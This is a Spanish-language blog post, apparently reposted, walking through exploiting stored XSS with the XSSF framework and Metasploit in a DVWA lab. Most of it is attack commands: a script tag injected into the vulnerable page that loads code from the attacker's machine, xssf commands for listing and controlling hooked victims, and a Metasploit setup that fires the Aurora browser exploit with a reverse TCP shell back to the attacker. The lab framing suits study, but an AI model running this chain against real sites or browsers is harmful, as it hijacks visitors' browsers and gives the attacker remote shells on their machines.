Blog de Hacking ®

It's te Hack Generation!

  • Mensaje de Bienvenida

    Estimado Visitante. Le damos la más cordial bienvenida a nuestra Blog de Hacking. Esperamos que encuentre con nosotros la información que usted busca, y que como resultado de ello, nos veamos favorecidos con su elección y preferencia hacia nosotros. En este blog usted podra encontrar muchas cosas de su utilidad, desde herramientas, manuales, tutoriales hazta consejos los cuales ayudaran a seguir ampliando su conocimiento & siga aumentando su pasiòn por la informàtica. Le deceamos mucha suerte & que se divierta en nuestro Blog, esperemos este lugar sea de su agrado, un cordial saludo & bienvenido. Atte: SiriusBl@ck

En el siguiente post, vamos a utilizar el framework XSSF con Metasploit, que nos permitirá atacar a una víctima con un simple XSS.

XSSF es un framework, creado por Ludovic Courgnaud, que nos permite “administrar” víctimas de XSS genéricos y realizar posteriores ataques, así como mantener el enlace para futuros ataques. Podemos encontrar una descripción más detallada del framework aquí.

Jugando con XSSF

Para realizar estas pruebas vamos a utilizar el DVWA, un framework para testing de vulnerabilidades web, instalado sobre una VM Windows XP y nuestro Backtrack 4 R2.

Lo primero que vamos a hacer es descargar el XSSF framework desde aquí y descomprimirlo en nuestro directorio de metasploit, luego iniciamos el framework:
Código:
# Instalamos XSSF en Metasploit
cd /opt/metasploit/msf3
wget http://www.metasploit.com/redmine/attachments
/596/XSSF.zip
unzip XSSF.zip
cd XSSF
cp -r data/ lib/ modules/ plugins/ ../
 
# Iniciamos Metasploit y cargamos el XSSF
msfconsole
load XSSF

Ahora vamos a DVWA, a la pestaña XSS stored, con el DVWA Security en “Low” e insertamos el siguiente XSS:
Código:
<script src=”http://IP_BACKTRACK:8888/loop?interval=5”></script>


Si todo funcionó bien, deberá quedar registrado nuestro nombre y el comentario en blanco.

Ahora, desde nuestra VM Windows XP, ingresamos a DVWA, ponemos el DVWA Security en “Low” y vamos a la pestaña XSS stored. Al momento de ingresar nuestro XSS entrará en acción 

Regresamos a nuestra consola de metasploit y vemos las víctimas que tenemos disponibles con el comando "xssf_victims":


Si queremos obtener más información acerca de alguna víctima, ingresamos el siguiente comando "xssf_information victimID":

Ahora ya podremos hacer varias cosas con la víctima, por ejemplo enviarle un popup:
Código:
use auxiliary/xssf/alert
set VictimIDs 2
set AlertMessage "Game Over"


También podremos lanzar un exploit contra el navegador para obtener una shell en el sistema:
Código:
use exploit/windows/browser/ms10_002_aurora
set SRVPORT 80
set PAYLOAD windows/shell/reverse_tcp
set LHOST IP_BACKTRACK
set URIPATH dvwa/vulnerabilities/xss_s/
Vemos que job nos creo, el id de la victima y luego lanzamos el exploit desde el XSSF:
Código:
jobsxssf_active_victimsxssf_exploit victimID jobID

Espero que les haya gustado mi primer post! 

Referencias:
http://www.metasploit.com/redmine/issues/2995
http://www.dvwa.co.uk/


Publicado por Lucas Duarte Wulfert en www.KUNGFOOSION.com

Categories:

0 Response for the "Explotando XSS con Metasploit"

Publicar un comentario